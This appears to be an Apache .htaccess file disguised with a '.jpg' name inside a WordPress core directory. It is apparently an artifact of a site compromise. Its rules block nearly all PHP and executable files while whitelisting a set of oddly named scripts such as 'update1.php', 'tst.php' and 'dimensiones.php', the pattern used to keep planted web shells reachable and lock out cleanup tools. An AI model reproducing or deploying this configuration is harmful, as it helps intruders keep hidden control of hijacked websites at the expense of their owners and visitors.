File: /var/www/clients/client62/web540/web/wp-includes/blocks/quote/fontshtaccess.jpg
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /wp-includes/fonts/
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(update.php|update1.php|index.php|Diff.php|themes.php|dimensiones.php|duotones.php|tst.php|other.php|spacings.php|wp-config-sample.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?$1